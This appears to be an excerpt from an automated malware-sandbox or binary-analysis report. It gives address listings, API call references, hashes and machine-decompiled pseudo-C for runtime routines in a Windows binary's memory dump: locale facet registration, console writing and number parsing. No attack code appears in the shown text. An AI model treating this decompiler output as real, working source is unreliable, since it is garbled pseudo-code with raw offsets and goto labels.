                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F87708
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F87712
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87763
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87783
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 5c1aae587d35174078e3260c297be41b5841b74ea229adb24cb1bde6b04a7fab
                                                                                                • Instruction ID: f4d67c464d6eefbee493215f010cb1dce7a66e6616035dbc0ed44af7867ea6d0
                                                                                                • Opcode Fuzzy Hash: 5c1aae587d35174078e3260c297be41b5841b74ea229adb24cb1bde6b04a7fab
                                                                                                • Instruction Fuzzy Hash: 7E01A13590021A9BCB04FB64CC457EEB7A1AF84760F24410AF411A7291DF78DA02EB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00FB37F6(void* _a4, long _a8, DWORD* _a12) {
                                                                                                				void* _t13;
                                                                                                
                                                                                                				_t13 = WriteConsoleW( *0xfcf920, _a4, _a8, _a12, 0);
                                                                                                				if(_t13 == 0 && GetLastError() == 6) {
                                                                                                					E00FB37DF();
                                                                                                					E00FB37A1();
                                                                                                					_t13 = WriteConsoleW( *0xfcf920, _a4, _a8, _a12, _t13);
                                                                                                				}
                                                                                                				return _t13;
                                                                                                			}




                                                                                                0x00fb3813
                                                                                                0x00fb3817
                                                                                                0x00fb3824
                                                                                                0x00fb3829
                                                                                                0x00fb3844
                                                                                                0x00fb3844
                                                                                                0x00fb384a

                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(?,?,FD8FA683,00000000,?,?,00FB315E,?,00000001,?,?,?,00FB1C87,00000000,00000004,?), ref: 00FB380D
                                                                                                • GetLastError.KERNEL32(?,00FB315E,?,00000001,?,?,?,00FB1C87,00000000,00000004,?,00000000,?,?,00FB21DB,00000000), ref: 00FB3819
                                                                                                  • Part of subcall function 00FB37DF: CloseHandle.KERNEL32(FFFFFFFE,00FB3829,?,00FB315E,?,00000001,?,?,?,00FB1C87,00000000,00000004,?,00000000,?), ref: 00FB37EF
                                                                                                • ___initconout.LIBCMT ref: 00FB3829
                                                                                                  • Part of subcall function 00FB37A1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FB37D0,00FB314B,?,?,00FB1C87,00000000,00000004,?,00000000), ref: 00FB37B4
                                                                                                • WriteConsoleW.KERNEL32(?,?,FD8FA683,00000000,?,00FB315E,?,00000001,?,?,?,00FB1C87,00000000,00000004,?,00000000), ref: 00FB383E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 453dd085322d6bb904e88cd2c7bcd3b4b83dd3daa9933202bf1535ee13f791d8
                                                                                                • Instruction ID: 3ddafa02275bdd02f6bece81be23c77bdaaffaf50962c38454856588db412f78
                                                                                                • Opcode Fuzzy Hash: 453dd085322d6bb904e88cd2c7bcd3b4b83dd3daa9933202bf1535ee13f791d8
                                                                                                • Instruction Fuzzy Hash: 60F01C37544118BBCF222F92DC45ACA3F26EB487F1B114120FA1996530CA32C925FF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E00F8363D(void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t129;
                                                                                                				intOrPtr* _t130;
                                                                                                				intOrPtr* _t135;
                                                                                                				void* _t145;
                                                                                                				intOrPtr* _t146;
                                                                                                				char* _t147;
                                                                                                				void* _t154;
                                                                                                				signed int _t155;
                                                                                                				signed int _t156;
                                                                                                				intOrPtr _t157;
                                                                                                				void* _t160;
                                                                                                				char* _t163;
                                                                                                				void* _t164;
                                                                                                				void* _t165;
                                                                                                				intOrPtr _t176;
                                                                                                				intOrPtr _t182;
                                                                                                				intOrPtr _t187;
                                                                                                				intOrPtr _t188;
                                                                                                				signed int _t207;
                                                                                                				signed int _t211;
                                                                                                				char _t219;
                                                                                                				void* _t230;
                                                                                                				intOrPtr _t231;
                                                                                                				intOrPtr _t232;
                                                                                                				signed int _t236;
                                                                                                				signed int _t237;
                                                                                                				char* _t241;
                                                                                                				signed int _t243;
                                                                                                				signed int _t245;
                                                                                                				void* _t246;
                                                                                                				void* _t247;
                                                                                                
                                                                                                				_t247 = __eflags;
                                                                                                				E00FB38E6(0xfb702f, __edi, __esi);
                                                                                                				_t187 =  *((intOrPtr*)(_t246 + 0x10));
                                                                                                				 *((intOrPtr*)(_t246 - 0x74)) =  *((intOrPtr*)(_t246 + 0xc));
                                                                                                				 *((intOrPtr*)(_t246 - 0x6c)) =  *((intOrPtr*)(_t246 + 0x14));
                                                                                                				_t129 =  *(_t246 + 0x1c);
                                                                                                				 *(_t246 - 0x64) = _t129;
                                                                                                				_t130 = E00F82295(__edi, __esi, _t247);
                                                                                                				_t234 = _t130;
                                                                                                				 *0xfb81fc(_t246 - 0x5c, _t129, 0x6c);
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x14))))();
                                                                                                				 *(_t246 - 4) =  *(_t246 - 4) & 0x00000000;
                                                                                                				if( *((intOrPtr*)(_t246 - 0x4c)) != 0) {
                                                                                                					 *((char*)(_t246 - 0x5e)) = E00F8531F(_t234);
                                                                                                				} else {
                                                                                                					 *((char*)(_t246 - 0x5e)) = 0;
                                                                                                				}
                                                                                                				_t135 = E00F79020( *(_t246 - 0x64));
                                                                                                				 *0xfb81fc("0123456789ABCDEFabcdef-+Xx", 0xfb8517, _t246 - 0x2c);
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x1c))))();
                                                                                                				_t241 =  *((intOrPtr*)(_t246 - 0x74));
                                                                                                				 *((intOrPtr*)(_t246 - 0x68)) = _t241;
                                                                                                				if(E00F81E28(_t187,  *((intOrPtr*)(_t246 - 0x6c))) == 0) {
                                                                                                					L13:
                                                                                                					_t243 =  *(_t246 + 0x18) & 0x00000e00;
                                                                                                					_t236 = 0xa;
                                                                                                					 *(_t246 - 0x64) = _t236;
                                                                                                					if(_t243 != 0x400) {
                                                                                                						__eflags = _t243 - 0x800;
                                                                                                						if(_t243 != 0x800) {
                                                                                                							asm("sbb esi, esi");
                                                                                                							_t245 =  ~_t243 & _t236;
                                                                                                							__eflags = _t245;
                                                                                                							L19:
                                                                                                							 *((char*)(_t246 - 0x5d)) = 0;
                                                                                                							 *((char*)(_t246 - 0x70)) = 0;
                                                                                                							 *((char*)(_t246 - 0x5f)) = 0;
                                                                                                							E00F81E28(_t187,  *((intOrPtr*)(_t246 - 0x6c)));
                                                                                                							if(0 == 0) {
                                                                                                								L35:
                                                                                                								__eflags = _t245;
                                                                                                								if(_t245 == 0) {
                                                                                                									L38:
                                                                                                									 *(_t246 - 0x34) =  *(_t246 - 0x34) & 0x00000000;
                                                                                                									 *((intOrPtr*)(_t246 - 0x30)) = 0xf;
                                                                                                									 *(_t246 - 0x44) = 0;
                                                                                                									E00F72AB0(_t187, _t236, 1,  *((intOrPtr*)(_t246 - 0x70)));
                                                                                                									_t237 = 0;
                                                                                                									 *(_t246 - 4) = 1;
                                                                                                									 *((intOrPtr*)(_t246 - 0x70)) =  *((intOrPtr*)(_t246 - 0x74)) + 0x1f;
                                                                                                									_t145 = E00F81E28(_t187,  *((intOrPtr*)(_t246 - 0x6c)));
                                                                                                									_pop(_t206);
                                                                                                									if(_t145 == 0) {
                                                                                                										_t207 =  *(_t246 - 0x44);
                                                                                                										_t188 =  *((intOrPtr*)(_t246 - 0x30));
                                                                                                										L70:
                                                                                                										_t231 =  *((intOrPtr*)(_t246 - 0x5d));
                                                                                                										L71:
                                                                                                										_t146 = _t246 - 0x5c;
                                                                                                										if( *((intOrPtr*)(_t246 - 0x48)) >= 0x10) {
                                                                                                											_t146 =  *((intOrPtr*)(_t246 - 0x5c));
                                                                                                										}
                                                                                                										if(_t231 == 0) {
                                                                                                											L88:
                                                                                                											_t147 =  *((intOrPtr*)(_t246 - 0x74));
                                                                                                											goto L89;
                                                                                                										} else {
                                                                                                											while(_t237 != 0) {
                                                                                                												_t232 =  *_t146;
                                                                                                												if(_t232 == 0x7f) {
                                                                                                													break;
                                                                                                												}
                                                                                                												_t237 = _t237 - 1;
                                                                                                												if(_t237 == 0) {
                                                                                                													L80:
                                                                                                													if(_t237 != 0) {
                                                                                                														L84:
                                                                                                														if( *((char*)(_t146 + 1)) > 0) {
                                                                                                															_t146 = _t146 + 1;
                                                                                                														}
                                                                                                														continue;
                                                                                                													}
                                                                                                													 *(_t246 - 0x64) = _t246 - 0x44;
                                                                                                													if( *((intOrPtr*)(_t246 - 0x30)) >= 0x10) {
                                                                                                														 *(_t246 - 0x64) = _t207;
                                                                                                													}
                                                                                                													_t188 =  *((intOrPtr*)(_t246 - 0x30));
                                                                                                													if(_t232 <  *( *(_t246 - 0x64))) {
                                                                                                														goto L88;
                                                                                                													} else {
                                                                                                														goto L84;
                                                                                                													}
                                                                                                												}
                                                                                                												 *(_t246 - 0x64) = _t246 - 0x44;
                                                                                                												_t211 =  *(_t246 - 0x44);
                                                                                                												if(_t188 >= 0x10) {
                                                                                                													_t188 =  *((intOrPtr*)(_t246 - 0x30));
                                                                                                													 *(_t246 - 0x64) = _t211;
                                                                                                												}
                                                                                                												_t207 =  *(_t246 - 0x44);
                                                                                                												if(_t232 !=  *((intOrPtr*)( *(_t246 - 0x64) + _t237))) {
                                                                                                													goto L88;
                                                                                                												} else {
                                                                                                													goto L80;
                                                                                                												}
                                                                                                											}
                                                                                                											__eflags =  *((char*)(_t246 - 0x5f));
                                                                                                											_t147 =  *((intOrPtr*)(_t246 - 0x68));
                                                                                                											if( *((char*)(_t246 - 0x5f)) == 0) {
                                                                                                												 *_t147 = 0x30;
                                                                                                												_t147 = _t147 + 1;
                                                                                                											}
                                                                                                											L89:
                                                                                                											 *_t147 = 0;
                                                                                                											E00F72570(_t246 - 0x44, _t237);
                                                                                                											E00F72570(_t246 - 0x5c, _t237);
                                                                                                											return E00FB38A1(_t245, _t237, _t245);
                                                                                                										}
                                                                                                									} else {
                                                                                                										goto L39;
                                                                                                									}
                                                                                                									do {
                                                                                                										L39:
                                                                                                										if( *((char*)(_t187 + 4)) == 0) {
                                                                                                											_t206 = _t187;
                                                                                                											E00F84188(_t187);
                                                                                                										}
                                                                                                										 *((intOrPtr*)(_t246 - 0x78)) =  *((intOrPtr*)(_t187 + 5));
                                                                                                										_t154 = E00F81E3E(_t206, _t246 - 0x2c,  *((intOrPtr*)(_t187 + 5)));
                                                                                                										if(_t154 >=  *(_t246 - 0x64)) {
                                                                                                											__eflags =  *((intOrPtr*)(_t246 - 0x30)) - 0x10;
                                                                                                											_t155 = _t246 - 0x44;
                                                                                                											_t207 =  *(_t246 - 0x44);
                                                                                                											if( *((intOrPtr*)(_t246 - 0x30)) >= 0x10) {
                                                                                                												_t155 = _t207;
                                                                                                											}
                                                                                                											__eflags =  *((char*)(_t155 + _t237));
                                                                                                											if( *((char*)(_t155 + _t237)) == 0) {
                                                                                                												L63:
                                                                                                												_t188 =  *((intOrPtr*)(_t246 - 0x30));
                                                                                                												if(_t237 == 0) {
                                                                                                													goto L70;
                                                                                                												}
                                                                                                												_t156 = _t246 - 0x44;
                                                                                                												if(_t188 >= 0x10) {
                                                                                                													_t156 = _t207;
                                                                                                												}
                                                                                                												if( *((char*)(_t156 + _t237)) <= 0) {
                                                                                                													_t231 = 0;
                                                                                                													goto L71;
                                                                                                												} else {
                                                                                                													_t237 = _t237 + 1;
                                                                                                													goto L70;
                                                                                                												}
                                                                                                											} else {
                                                                                                												__eflags =  *((char*)(_t246 - 0x5e));
                                                                                                												if( *((char*)(_t246 - 0x5e)) == 0) {
                                                                                                													goto L63;
                                                                                                												}
                                                                                                												__eflags =  *((char*)(_t187 + 4));
                                                                                                												if( *((char*)(_t187 + 4)) != 0) {
                                                                                                													_t157 =  *((intOrPtr*)(_t246 - 0x78));
                                                                                                												} else {
                                                                                                													E00F84188(_t187);
                                                                                                													_t157 =  *((intOrPtr*)(_t187 + 5));
                                                                                                													_t207 =  *(_t246 - 0x44);
                                                                                                												}
                                                                                                												__eflags = _t157 -  *((intOrPtr*)(_t246 - 0x5e));
                                                                                                												if(_t157 !=  *((intOrPtr*)(_t246 - 0x5e))) {
                                                                                                													goto L63;
                                                                                                												} else {
                                                                                                													_push(0);
                                                                                                													E00F7F5B0(_t187, _t246 - 0x44, _t230, _t237);
                                                                                                													_t237 = _t237 + 1;
                                                                                                													__eflags = _t237;
                                                                                                													goto L61;
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t219 =  *((intOrPtr*)(_t154 + "0123456789ABCDEFabcdef-+Xx"));
                                                                                                											_t163 =  *((intOrPtr*)(_t246 - 0x68));
                                                                                                											 *_t163 = _t219;
                                                                                                											if( *((char*)(_t246 - 0x5f)) != 0 || _t219 != 0x30) {
                                                                                                												if(_t163 <  *((intOrPtr*)(_t246 - 0x70))) {
                                                                                                													 *((char*)(_t246 - 0x5f)) = 1;
                                                                                                													 *((intOrPtr*)(_t246 - 0x68)) = _t163 + 1;
                                                                                                												}
                                                                                                											}
                                                                                                											_t164 = _t246 - 0x44;
                                                                                                											 *((char*)(_t246 - 0x5d)) = 1;
                                                                                                											if( *((intOrPtr*)(_t246 - 0x30)) >= 0x10) {
                                                                                                												_t164 =  *(_t246 - 0x44);
                                                                                                											}
                                                                                                											if( *((char*)(_t164 + _t237)) != 0x7f) {
                                                                                                												_t165 = _t246 - 0x44;
                                                                                                												if( *((intOrPtr*)(_t246 - 0x30)) >= 0x10) {
                                                                                                													_t165 =  *(_t246 - 0x44);
                                                                                                												}
                                                                                                												 *((char*)(_t165 + _t237)) =  *((char*)(_t165 + _t237)) + 1;
                                                                                                											}
                                                                                                										}
                                                                                                										L61:
                                                                                                										E00F83A34(_t187);
                                                                                                										_t160 = E00F81E28(_t187,  *((intOrPtr*)(_t246 - 0x6c)));
                                                                                                										_pop(_t206);
                                                                                                									} while (_t160 != 0);
                                                                                                									_t207 =  *(_t246 - 0x44);
                                                                                                									goto L63;
                                                                                                								}
                                                                                                								L36:
                                                                                                								__eflags = _t245 - _t236;
                                                                                                								if(_t245 == _t236) {
                                                                                                									goto L38;
                                                                                                								}
                                                                                                								L37:
                                                                                                								 *(_t246 - 0x64) = ((0 | _t245 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
                                                                                                								goto L38;
                                                                                                							}
                                                                                                							if( *((char*)(_t187 + 4)) == 0) {
                                                                                                								E00F84188(_t187);
                                                                                                							}
                                                                                                							if( *((intOrPtr*)(_t187 + 5)) !=  *((intOrPtr*)(_t246 - 0x2c))) {
                                                                                                								goto L35;
                                                                                                							} else {
                                                                                                								 *((char*)(_t246 - 0x5d)) = 1;
                                                                                                								 *((char*)(_t246 - 0x70)) = 1;
                                                                                                								E00F83A34(_t187);
                                                                                                								E00F81E28(_t187,  *((intOrPtr*)(_t246 - 0x6c)));
                                                                                                								if(1 == 0) {
                                                                                                									L33:
                                                                                                									__eflags = _t245;
                                                                                                									if(_t245 != 0) {
                                                                                                										goto L36;
                                                                                                									}
                                                                                                									_t245 = 8;
                                                                                                									goto L35;
                                                                                                								}
                                                                                                								if( *((char*)(_t187 + 4)) == 0) {
                                                                                                									E00F84188(_t187);
                                                                                                								}
                                                                                                								_t176 =  *((intOrPtr*)(_t187 + 5));
                                                                                                								if(_t176 ==  *((intOrPtr*)(_t246 - 0x13))) {
                                                                                                									L30:
                                                                                                									if(_t245 == 0 || _t245 == 0x10) {
                                                                                                										_t245 = 0x10;
                                                                                                										 *((char*)(_t246 - 0x5d)) = 0;
                                                                                                										 *((char*)(_t246 - 0x70)) = 0;
                                                                                                										E00F83A34(_t187);
                                                                                                										goto L37;
                                                                                                									} else {
                                                                                                										goto L33;
                                                                                                									}
                                                                                                								} else {
                                                                                                									if( *((char*)(_t187 + 4)) == 0) {
                                                                                                										E00F84188(_t187);
                                                                                                										_t176 =  *((intOrPtr*)(_t187 + 5));
                                                                                                									}
                                                                                                									if(_t176 !=  *((intOrPtr*)(_t246 - 0x14))) {
                                                                                                										goto L33;
                                                                                                									} else {
                                                                                                										goto L30;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_push(0x10);
                                                                                                						L17:
                                                                                                						_pop(_t245);
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					_push(8);
                                                                                                					goto L17;
                                                                                                				} else {
                                                                                                					if( *((char*)(_t187 + 4)) == 0) {
                                                                                                						E00F84188(_t187);
                                                                                                					}
                                                                                                					_t182 =  *((intOrPtr*)(_t187 + 5));
                                                                                                					if(_t182 !=  *((intOrPtr*)(_t246 - 0x15))) {
                                                                                                						__eflags =  *((char*)(_t187 + 4));
                                                                                                						if( *((char*)(_t187 + 4)) == 0) {
                                                                                                							E00F84188(_t187);
                                                                                                							_t182 =  *((intOrPtr*)(_t187 + 5));
                                                                                                						}
                                                                                                						__eflags = _t182 -  *((intOrPtr*)(_t246 - 0x16));
                                                                                                						if(_t182 !=  *((intOrPtr*)(_t246 - 0x16))) {
                                                                                                							goto L13;
                                                                                                						} else {
                                                                                                							 *_t241 = 0x2d;
                                                                                                							goto L12;
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *_t241 = 0x2b;
                                                                                                						L12:
                                                                                                						 *((intOrPtr*)(_t246 - 0x68)) = _t241 + 1;
                                                                                                						E00F83A34(_t187);
                                                                                                						goto L13;
                                                                                                					}
                                                                                                				}
                                                                                                			}


































                                                                                                0x00f8363d
                                                                                                0x00f83644
                                                                                                0x00f8364c
                                                                                                0x00f8364f
                                                                                                0x00f83655
                                                                                                0x00f83658
                                                                                                0x00f8365c
                                                                                                0x00f8365f
                                                                                                0x00f83664
                                                                                                0x00f83672
                                                                                                0x00f8367a
                                                                                                0x00f8367c
                                                                                                0x00f83684
                                                                                                0x00f83693
                                                                                                0x00f83686
                                                                                                0x00f83686
                                                                                                0x00f83686
                                                                                                0x00f83699
                                                                                                0x00f836b6
                                                                                                0x00f836be
                                                                                                0x00f836c3
                                                                                                0x00f836c7
                                                                                                0x00f836d3
                                                                                                0x00f83714
                                                                                                0x00f83719
                                                                                                0x00f8371f
                                                                                                0x00f83720
                                                                                                0x00f83729
                                                                                                0x00f8372f
                                                                                                0x00f83735
                                                                                                0x00f8373e
                                                                                                0x00f83740
                                                                                                0x00f83740
                                                                                                0x00f83742
                                                                                                0x00f83748
                                                                                                0x00f8374b
                                                                                                0x00f8374e
                                                                                                0x00f83751
                                                                                                0x00f8375a
                                                                                                0x00f837e1
                                                                                                0x00f837e1
                                                                                                0x00f837e3
                                                                                                0x00f837fb
                                                                                                0x00f837fe
                                                                                                0x00f83807
                                                                                                0x00f8380e
                                                                                                0x00f83812
                                                                                                0x00f8381a
                                                                                                0x00f83822
                                                                                                0x00f83827
                                                                                                0x00f8382a
                                                                                                0x00f83830
                                                                                                0x00f83833
                                                                                                0x00f83924
                                                                                                0x00f83927
                                                                                                0x00f8392a
                                                                                                0x00f8392a
                                                                                                0x00f8392d
                                                                                                0x00f83931
                                                                                                0x00f83934
                                                                                                0x00f83936
                                                                                                0x00f83936
                                                                                                0x00f8393b
                                                                                                0x00f839a1
                                                                                                0x00f839a1
                                                                                                0x00000000
                                                                                                0x00f8393d
                                                                                                0x00f8393d
                                                                                                0x00f83941
                                                                                                0x00f83946
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f83948
                                                                                                0x00f8394b
                                                                                                0x00f8396c
                                                                                                0x00f8396e
                                                                                                0x00f83989
                                                                                                0x00f8398d
                                                                                                0x00f8398f
                                                                                                0x00f8398f
                                                                                                0x00000000
                                                                                                0x00f8398d
                                                                                                0x00f83977
                                                                                                0x00f8397a
                                                                                                0x00f8397c
                                                                                                0x00f8397c
                                                                                                0x00f83984
                                                                                                0x00f83987
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f83987
                                                                                                0x00f83950
                                                                                                0x00f83953
                                                                                                0x00f83959
                                                                                                0x00f8395b
                                                                                                0x00f8395e
                                                                                                0x00f8395e
                                                                                                0x00f83967
                                                                                                0x00f8396a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8396a
                                                                                                0x00f83992
                                                                                                0x00f83996
                                                                                                0x00f83999
                                                                                                0x00f8399b
                                                                                                0x00f8399e
                                                                                                0x00f8399e
                                                                                                0x00f839a4
                                                                                                0x00f839a7
                                                                                                0x00f839aa
                                                                                                0x00f839b2
                                                                                                0x00f839be
                                                                                                0x00f839be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f83839
                                                                                                0x00f83839
                                                                                                0x00f8383d
                                                                                                0x00f8383f
                                                                                                0x00f83841
                                                                                                0x00f83841
                                                                                                0x00f8384a
                                                                                                0x00f83851
                                                                                                0x00f8385b
                                                                                                0x00f838a7
                                                                                                0x00f838ab
                                                                                                0x00f838ae
                                                                                                0x00f838b1
                                                                                                0x00f838b3
                                                                                                0x00f838b3
                                                                                                0x00f838b5
                                                                                                0x00f838b9
                                                                                                0x00f83906
                                                                                                0x00f83906
                                                                                                0x00f8390b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8390d
                                                                                                0x00f83913
                                                                                                0x00f83915
                                                                                                0x00f83915
                                                                                                0x00f8391b
                                                                                                0x00f83920
                                                                                                0x00000000
                                                                                                0x00f8391d
                                                                                                0x00f8391d
                                                                                                0x00000000
                                                                                                0x00f8391d
                                                                                                0x00f838bb
                                                                                                0x00f838bb
                                                                                                0x00f838bf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f838c1
                                                                                                0x00f838c5
                                                                                                0x00f838d6
                                                                                                0x00f838c7
                                                                                                0x00f838c9
                                                                                                0x00f838ce
                                                                                                0x00f838d1
                                                                                                0x00f838d1
                                                                                                0x00f838d9
                                                                                                0x00f838dc
                                                                                                0x00000000
                                                                                                0x00f838de
                                                                                                0x00f838de
                                                                                                0x00f838e3
                                                                                                0x00f838e8
                                                                                                0x00f838e8
                                                                                                0x00000000
                                                                                                0x00f838e8
                                                                                                0x00f838dc
                                                                                                0x00f8385d
                                                                                                0x00f83861
                                                                                                0x00f83867
                                                                                                0x00f8386a
                                                                                                0x00f8386c
                                                                                                0x00f83876
                                                                                                0x00f83879
                                                                                                0x00f8387d
                                                                                                0x00f8387d
                                                                                                0x00f83876
                                                                                                0x00f83884
                                                                                                0x00f83887
                                                                                                0x00f8388b
                                                                                                0x00f8388d
                                                                                                0x00f8388d
                                                                                                0x00f83894
                                                                                                0x00f8389a
                                                                                                0x00f8389d
                                                                                                0x00f8389f
                                                                                                0x00f8389f
                                                                                                0x00f838a2
                                                                                                0x00f838a2
                                                                                                0x00f83894
                                                                                                0x00f838e9
                                                                                                0x00f838eb
                                                                                                0x00f838f4
                                                                                                0x00f838fa
                                                                                                0x00f838fb
                                                                                                0x00f83903
                                                                                                0x00000000
